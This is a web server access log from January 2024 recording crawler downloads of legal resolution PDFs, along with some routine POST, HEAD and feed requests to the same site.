156.59.198.136 - - [07/Jan/2024:04:20:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/3058.pdf HTTP/1.0" 200 269538
216.244.66.195 - - [07/Jan/2024:04:21:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0131.pdf HTTP/1.1" 200 508271
201.245.192.253 - - [07/Jan/2024:04:21:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
156.59.198.136 - - [07/Jan/2024:04:21:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3524.pdf HTTP/1.0" 200 454236
40.77.167.126 - - [07/Jan/2024:04:21:24 -0500] "GET /portaldeninos/2018/06/06/hola-mundo-3-2/feed/ HTTP/1.1" 200 977
156.59.198.136 - - [07/Jan/2024:04:21:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0344.pdf HTTP/1.0" 200 765748
216.244.66.195 - - [07/Jan/2024:04:21:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0572.pdf HTTP/1.1" 200 214255
156.59.198.135 - - [07/Jan/2024:04:22:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/4717.pdf HTTP/1.0" 200 268590
216.244.66.195 - - [07/Jan/2024:04:22:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0671.pdf HTTP/1.1" 200 418055
156.59.198.135 - - [07/Jan/2024:04:22:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/4474.pdf HTTP/1.0" 200 310065
156.59.198.135 - - [07/Jan/2024:04:22:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/2161.pdf HTTP/1.0" 200 255328
216.244.66.195 - - [07/Jan/2024:04:23:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0801.pdf HTTP/1.1" 200 508371
156.59.198.136 - - [07/Jan/2024:04:23:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/4618.pdf HTTP/1.0" 200 304985
216.244.66.195 - - [07/Jan/2024:04:23:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0837.pdf HTTP/1.1" 200 1239660
156.59.198.135 - - [07/Jan/2024:04:23:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0428.pdf HTTP/1.0" 200 332689
172.22.2.4 - - [07/Jan/2024:04:22:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [07/Jan/2024:04:24:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2802.pdf HTTP/1.0" 200 556691
216.244.66.195 - - [07/Jan/2024:04:24:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1034.pdf HTTP/1.1" 200 723261
156.59.198.135 - - [07/Jan/2024:04:24:28 -0500] "GET /BLA/resoluciones/AUTOS%202019/0471.pdf HTTP/1.0" 200 285128
216.244.66.195 - - [07/Jan/2024:04:24:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1352.pdf HTTP/1.1" 200 2741729
172.22.2.4 - - [07/Jan/2024:04:23:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58567
156.59.198.136 - - [07/Jan/2024:04:24:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/4471.pdf HTTP/1.0" 200 305477
216.244.66.195 - - [07/Jan/2024:04:25:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1447.pdf HTTP/1.1" 200 599132
201.245.192.253 - - [07/Jan/2024:04:25:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36637
201.245.192.253 - - [07/Jan/2024:04:25:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36798
156.59.198.135 - - [07/Jan/2024:04:25:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/1668.pdf HTTP/1.0" 200 238328
216.245.221.92 - - [07/Jan/2024:04:25:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Jan/2024:04:25:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1676.pdf HTTP/1.1" 200 1082042
156.59.198.136 - - [07/Jan/2024:04:25:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1853.pdf HTTP/1.0" 200 407553
156.59.198.135 - - [07/Jan/2024:04:26:07 -0500] "GET /BLA/resoluciones/AUTOS%202019/1407.pdf HTTP/1.0" 200 276693
201.245.192.253 - - [07/Jan/2024:04:26:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36937
216.244.66.195 - - [07/Jan/2024:04:26:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1715.pdf HTTP/1.1" 200 403705
156.59.198.135 - - [07/Jan/2024:04:26:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0539.pdf HTTP/1.0" 200 353475
216.244.66.195 - - [07/Jan/2024:04:26:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1970.pdf HTTP/1.1" 200 400540
156.59.198.136 - - [07/Jan/2024:04:26:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2543.pdf HTTP/1.0" 200 1246484
216.244.66.195 - - [07/Jan/2024:04:27:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2095.pdf HTTP/1.1" 200 280450
156.59.198.135 - - [07/Jan/2024:04:27:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0377.pdf HTTP/1.0" 200 383221
156.59.198.135 - - [07/Jan/2024:04:27:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0234.pdf HTTP/1.0" 200 334983
